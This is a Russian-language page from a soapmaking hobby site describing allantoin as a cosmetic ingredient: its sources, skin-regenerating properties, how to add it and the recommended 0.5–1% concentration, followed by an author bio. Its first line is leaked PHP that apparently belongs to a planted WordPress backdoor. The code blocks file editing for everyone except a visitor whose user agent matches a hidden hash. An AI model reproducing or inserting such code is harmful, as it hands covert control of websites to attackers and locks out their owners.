if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Аллантоин | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Аллантоин

Аллантоин – неотъемлемая составляющая современных косметологических средств. Данный продукт содержится в семенах и кореньях растений, чаще всего изготавливается из корня окопника

Ингредиенты для мыла - аллантоин Ингредиенты для мыла - аллантоин

Аллан­то­ин – неотъ­ем­ле­мая состав­ля­ю­щая совре­мен­ных кос­ме­то­ло­ги­че­ских средств. Дан­ный про­дукт содер­жит­ся в семе­нах и коре­ньях рас­те­ний, чаще все­го изго­тав­ли­ва­ет­ся из кор­ня окопника.

Свой­ства

Аллан­то­ин явля­ет­ся мощ­ным ката­ли­за­то­ром про­цес­сов кле­точ­ной актив­но­сти, спо­соб­ству­ет реге­не­ра­ции кож­ных покро­вов, ока­зы­ва­ет смяг­ча­ю­щий и вос­ста­нав­ли­ва­ю­щий эффект.

В меди­цине аллан­то­ин исполь­зу­ет­ся для зажив­ле­ния ран, язв, поре­зов, т.к. обла­да­ет анти­сеп­ти­че­ски­ми свой­ства­ми; не ток­си­чен при исполь­зо­ва­нии в нуж­ной кон­цен­тра­ции. Наи­боль­ший эффект дости­га­ет­ся при наруж­ном применении.

При­ме­не­ние

Широ­ко исполь­зо­ва­ние аллан­то­и­на в допу­сти­мой кон­цен­тра­ции в кре­мах, лосьо­нах, тони­ках. Он явля­ет­ся актив­ным ком­по­нен­том в лини­ях по ухо­ду за кожей, воло­са­ми, зуба­ми, в кос­ме­ти­ке по ухо­ду после бри­тья, а так­же дет­ской кос­ме­ти­ке. Про­дукт вво­дит­ся непо­сред­ствен­но в вод­ную фазу. Пере­грев аллан­то­и­на до 40°C и выше при­во­дит к его разрушению.

Реко­мен­ду­е­мая кон­цен­тра­ция исполь­зо­ва­ния: 0,5%-1%.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!